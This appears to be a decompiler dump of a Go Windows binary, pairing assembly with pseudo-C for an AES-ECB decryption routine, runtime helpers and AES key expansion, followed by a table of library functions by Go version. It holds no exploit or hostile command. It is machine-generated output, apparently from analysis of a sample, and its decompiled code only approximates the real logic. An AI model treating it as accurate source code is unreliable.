mov rdx, [rsp+0x120]
mov rax, [rsp+0xD0]
mov r11, [rsp+0x130]
mov rdi, [rsp+0x128]
mov r12, [rsp+0xD8]
mov r13, [rsp+0x48]
mov rax, r12
mov rbx, [rsp+0xD0]
mov rsi, r11
mov r8, r13
.4:
cmp rdi, r10
jle .5
cmp rdi, rcx
jb .9
cmp rcx, r10
jnb .3
jmp .8
.5:
lea r8, [rdi-0x01]
cmp rdi, r8
jbe .7
movzx r8d, byte ptr [rdi+rax*1-0x01]
mov rcx, rdi
sub rcx, r8
cmp rdi, rcx
jb .6
mov rbx, rcx
mov rcx, rdi
xor edi, edi
xor esi, esi
mov rbp, [rsp+0x110]
add rsp, 0x118
ret
.6:
mov rdx, rdi
call runtime.panicSliceAcap()
.7:
mov rax, r8
mov rcx, rdi
call runtime.panicIndex()
.8:
mov rax, r10
call runtime.panicSliceB()
.9:
mov rdx, rdi
call runtime.panicSliceAcap()
nop
.10:
mov [rsp+0x08], rax
mov [rsp+0x10], rbx
mov [rsp+0x18], rcx
mov [rsp+0x20], rdi
mov [rsp+0x28], rsi
call runtime.morestack_noctxt()
mov rax, [rsp+0x08]
mov rbx, [rsp+0x10]
mov rcx, [rsp+0x18]
mov rdi, [rsp+0x20]
mov rsi, [rsp+0x28]
jmp main.AesDecryptByECB()
}
/* DISPLAY WARNING: Type casts are NOT being printed */
int64_t main.AesDecryptByECB
(undefined8 param_1,undefined8 param_2,undefined8 param_3,undefined8 param_4,undefined8 param_5)
{
code *pcVar1;
undefined4 uVar2;
int64_t extraout_RAX;
undefined8 uVar3;
int64_t iVar4;
undefined8 extraout_RAX_00;
int64_t extraout_RCX;
uint64_t uVar5;
undefined8 extraout_RCX_00;
int64_t iVar6;
char extraout_BL;
undefined8 extraout_RBX;
undefined8 extraout_RBX_00;
undefined8 extraout_RBX_01;
undefined *puVar7;
undefined8 unaff_RBP;
int64_t iVar8;
undefined8 extraout_RSI;
uint64_t extraout_RDI;
uint64_t uVar9;
undefined8 extraout_RDI_00;
int64_t iVar10;
uint64_t extraout_R8;
uint64_t uVar11;
uint64_t extraout_R10;
int64_t unaff_R14;
undefined in_XMM15 [16];
do {
puVar7 = register0x00000020;
if (*(unaff_R14 + 0x10) < register0x00000020 + -0x98) {
puVar7 = register0x00000020 + -0x118;
*(register0x00000020 + -8) = unaff_RBP;
*(register0x00000020 + 0x18) = param_3;
*(register0x00000020 + 8) = param_1;
*(register0x00000020 + 0x28) = param_5;
*(register0x00000020 + 0x10) = param_2;
*(register0x00000020 + 0x20) = param_4;
*(register0x00000020 + -0x38) = in_XMM15;
*(register0x00000020 + -0x28) = in_XMM15;
*(register0x00000020 + -0x18) = in_XMM15;
*(register0x00000020 + -0x128) = register0x00000020 + -8;
*(register0x00000020 + -0x120) = 0x47bb4f;
func_0x0045d5f0();
unaff_RBP = *(register0x00000020 + -0x128);
*(register0x00000020 + -0x28) = register0x00000020 + -0x98;
*(register0x00000020 + -0x120) = 0x47bb68;
uVar2 = runtime.fastrand();
*(register0x00000020 + -0x2c) = uVar2;
*(register0x00000020 + -0x120) = 0x47bb88;
runtime.mapassign_fast64(0x486740, register0x00000020 + -0x38, 0x10);
*(register0x00000020 + -0x120) = 0x47bba5;
runtime.mapassign_fast64(0x486740, register0x00000020 + -0x38, 0x18);
*(register0x00000020 + -0x120) = 0x47bbc5;
runtime.mapassign_fast64(0x486740, register0x00000020 + -0x38, 0x20);
*(register0x00000020 + -0x120) = 0x47bbe5;
runtime.mapaccess2_fast64(0x486740, register0x00000020 + -0x38, *(register0x00000020 + 0x28));
if (extraout_BL == '\0') {
return 0;
}
*(register0x00000020 + -0x120) = 0x47bc07;
runtime.stringtoslicebyte
(register0x00000020 + -0xb8, *(register0x00000020 + 0x20), *(register0x00000020 + 0x28));
*(register0x00000020 + -0x120) = 0x47bc0c;
crypto.aes.NewCipher();
if (extraout_RCX != 0) {
return 0;
}
*(register0x00000020 + -0x48) = extraout_RBX;
*(register0x00000020 + -0xd0) = extraout_RAX;
pcVar1 = *(extraout_RAX + 0x18);
*(register0x00000020 + -0x120) = 0x47bc27;
uVar3 = (*pcVar1)(extraout_RBX);
*(register0x00000020 + -0xd8) = uVar3;
*(register0x00000020 + -0x120) = 0x47bc45;
iVar4 = runtime.makeslice(0x484180, *(register0x00000020 + 0x10), *(register0x00000020 + 0x10));
*(register0x00000020 + -0x40) = iVar4;
uVar5 = *(register0x00000020 + -0xd8);
iVar6 = *(register0x00000020 + 8);
uVar3 = *(register0x00000020 + -0x48);
iVar8 = *(register0x00000020 + 0x18);
uVar9 = *(register0x00000020 + 0x10);
iVar10 = *(register0x00000020 + -0xd0);
uVar11 = 0;
while (uVar11 < uVar9) {
if (uVar9 < uVar5) goto code_r0x0047bdc5;
if (uVar5 < uVar11) goto code_r0x0047bdbd;
*(register0x00000020 + -0xe0) = uVar11;
*(register0x00000020 + -200) = uVar5;
pcVar1 = *(iVar10 + 0x20);
*(register0x00000020 + -0xc0) = iVar8 - uVar11;
*(register0x00000020 + -0x120) = 0x47bd0c;
(*pcVar1)(uVar3, (-(uVar9 - uVar11) >> 0x3f & uVar11) + iVar4, uVar5 - uVar11, uVar9 - uVar11,
(-(iVar8 - uVar11) >> 0x3f & uVar11) + iVar6, uVar5 - uVar11, *(register0x00000020 + -0xc0));
uVar5 = *(register0x00000020 + -200) + *(register0x00000020 + -0xd8);
iVar6 = *(register0x00000020 + 8);
iVar8 = *(register0x00000020 + 0x18);
uVar9 = *(register0x00000020 + 0x10);
iVar4 = *(register0x00000020 + -0x40);
iVar10 = *(register0x00000020 + -0xd0);
uVar3 = *(register0x00000020 + -0x48);
uVar11 = *(register0x00000020 + -0xe0) + *(register0x00000020 + -0xd8);
}
uVar11 = uVar9 - 1;
if (uVar11 < uVar9) {
if (uVar9 - *((uVar9 - 1) + iVar4) <= uVar9) {
return iVar4;
}
*(register0x00000020 + -0x120) = 0x47bdb2;
runtime.panicSliceAcap();
uVar3 = extraout_RBX_00;
uVar9 = extraout_RDI;
uVar11 = extraout_R8;
}
*(register0x00000020 + -0x120) = 0x47bdbd;
runtime.panicIndex(uVar11, uVar3, uVar9);
uVar11 = extraout_R10;
code_r0x0047bdbd:
*(register0x00000020 + -0x120) = 0x47bdc5;
runtime.panicSliceB(uVar11);
code_r0x0047bdc5:
*(register0x00000020 + -0x120) = 0x47bdcd;
runtime.panicSliceAcap();
param_1 = extraout_RAX_00;
param_3 = extraout_RCX_00;
param_2 = extraout_RBX_01;
param_5 = extraout_RSI;
param_4 = extraout_RDI_00;
}
*(puVar7 + 8) = param_1;
*(puVar7 + 0x10) = param_2;
*(puVar7 + 0x18) = param_3;
*(puVar7 + 0x20) = param_4;
*(puVar7 + 0x28) = param_5;
*(puVar7 + -8) = 0x47bdec;
runtime.morestack_noctxt();
param_1 = *(puVar7 + 8);
param_2 = *(puVar7 + 0x10);
param_3 = *(puVar7 + 0x18);
param_4 = *(puVar7 + 0x20);
param_5 = *(puVar7 + 0x28);
register0x00000020 = puVar7;
} while( true );
}
0x45ECE0 nanotime1 str 0 api 0 imm 5 Unknown
runtime.nanotime1() {
cmp byte ptr [0x5A22D4], 0x00
jnz .1
mov rdi, 0x7FFE0008
mov rax, [rdi]
imul rax, rax, 0x64
mov [rsp+0x08], rax
ret
.1:
jmp runtime.nanotimeQPC()
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void runtime.nanotime1(void)
{
if ([0x0x5a22d4] == '\0') {
return;
}
runtime.nanotimeQPC();
return;
}
0x45ECC0 switchtothread str 0 api 0 imm 4 Unknown
runtime.switchtothread() {
mov rax, rsp
and rsp, 0xFFFFFFFFFFFFFFF0
sub rsp, 0x30
mov [rsp+0x20], rax
mov rax, [kernel32.SwitchToThread]
call rax
mov rsp, [rsp+0x20]
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void runtime.switchtothread(void)
{
(*kernel32.SwitchToThread)();
return;
}
0x469AC0 _expand_key_128 str 0 api 0 imm 4 Unknown
_expand_key_128() {
pshufd xmm1, xmm1, 0xFF
shufps xmm4, xmm0, 0x10
pxor xmm0, xmm4
shufps xmm4, xmm0, 0x8C
pxor xmm0, xmm4
pxor xmm0, xmm1
movups [rbx], xmm0
add rbx, 0x10
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void _expand_key_128(undefined8 param_1,undefined8 param_2,uint32_t *param_3)
{
uint32_t uVar1;
uint32_t uVar2;
uint32_t in_XMM0_Dc;
uint32_t uVar3;
uint32_t in_XMM0_Dd;
uint32_t in_XMM1_Dd;
uint32_t in_XMM4_Da;
uVar2 = param_1 >> 0x20;
uVar1 = param_1;
uVar3 = in_XMM0_Dc ^ uVar2;
*param_3 = uVar1 ^ in_XMM1_Dd;
param_3[1] = uVar2 ^ in_XMM4_Da ^ uVar1 ^ in_XMM1_Dd;
param_3[2] = uVar3 ^ uVar1 ^ in_XMM4_Da ^ in_XMM1_Dd;
param_3[3] = in_XMM0_Dd ^ uVar1 ^ uVar3 ^ in_XMM1_Dd;
return;
}
0x469BC0 _expand_key_256b str 0 api 0 imm 4 Unknown
_expand_key_256b() {
pshufd xmm1, xmm1, 0xAA
shufps xmm4, xmm2, 0x10
pxor xmm2, xmm4
shufps xmm4, xmm2, 0x8C
pxor xmm2, xmm4
pxor xmm2, xmm1
movups [rbx], xmm2
add rbx, 0x10
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void _expand_key_256b(undefined8 param_1,undefined8 param_2,undefined8 param_3,undefined8 param_4,uint32_t param_5,
undefined8 param_6,uint32_t *param_7)
{
uint32_t in_XMM1_Dc;
uint32_t uVar1;
uint32_t uVar2;
uint32_t in_XMM2_Dc;
uint32_t uVar3;
uint32_t in_XMM2_Dd;
uVar2 = param_3 >> 0x20;
uVar1 = param_3;
uVar3 = in_XMM2_Dc ^ uVar2;
*param_7 = uVar1 ^ in_XMM1_Dc;
param_7[1] = uVar2 ^ param_5 ^ uVar1 ^ in_XMM1_Dc;
param_7[2] = uVar3 ^ uVar1 ^ param_5 ^ in_XMM1_Dc;
param_7[3] = in_XMM2_Dd ^ uVar1 ^ uVar3 ^ in_XMM1_Dc;
return;
}
0x4024A0 0 str 0 api 0 imm 3 Unknown
internal.bytealg.init.0() {
cmp byte ptr [0x5A2AC3], 0x00
jz .1
mov qword ptr [0x5A2358], 0x3F
jmp .2
.1:
mov qword ptr [0x5A2358], 0x1F
.2:
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void internal.bytealg.init.0(void)
{
if ([0x0x5a2ac3] == '\0') {
[0x0x5a2358] = 0x1f;
}
else {
[0x0x5a2358] = 0x3f;
}
return;
}
0x405200 chansend1 str 0 api 0 imm 3 Unknown
runtime.chansend1() {
sub rsp, 0x28
mov [rsp+0x20], rbp
lea rbp, [rsp+0x20]
mov ecx, 0x01
mov rdi, [rsp+0x28]
call runtime.chansend()
mov rbp, [rsp+0x20]
add rsp, 0x28
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void runtime.chansend1(undefined8 param_1,undefined8 param_2)
{
undefined8 unaff_retaddr;
runtime.chansend(param_1, param_2, 1, unaff_retaddr);
return;
}
0x405F60 chanrecv1 str 0 api 0 imm 3 Unknown
runtime.chanrecv1() {
sub rsp, 0x20
mov [rsp+0x18], rbp
lea rbp, [rsp+0x18]
mov ecx, 0x01
call runtime.chanrecv()
mov rbp, [rsp+0x18]
add rsp, 0x20
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void runtime.chanrecv1(undefined8 param_1,undefined8 param_2)
{
runtime.chanrecv(param_1, param_2, 1);
return;
}
| Library | Functions |
|---|---|
| golang-1.20 | 854 |
| golang-1.19 | 389 |
| golang-1.18 | 315 |
| runtime/other | 290 |
| golang-1.17 | 221 |
| golang-1.21 | 22 |
| golang-1.22 | 18 |
| golang-1.23 | 17 |
| golang-1.24 | 13 |
| golang-1.25 | 12 |
| golang-1.16 | 2 |
| golang-1.14 | 1 |
| golang-1.15 | 1 |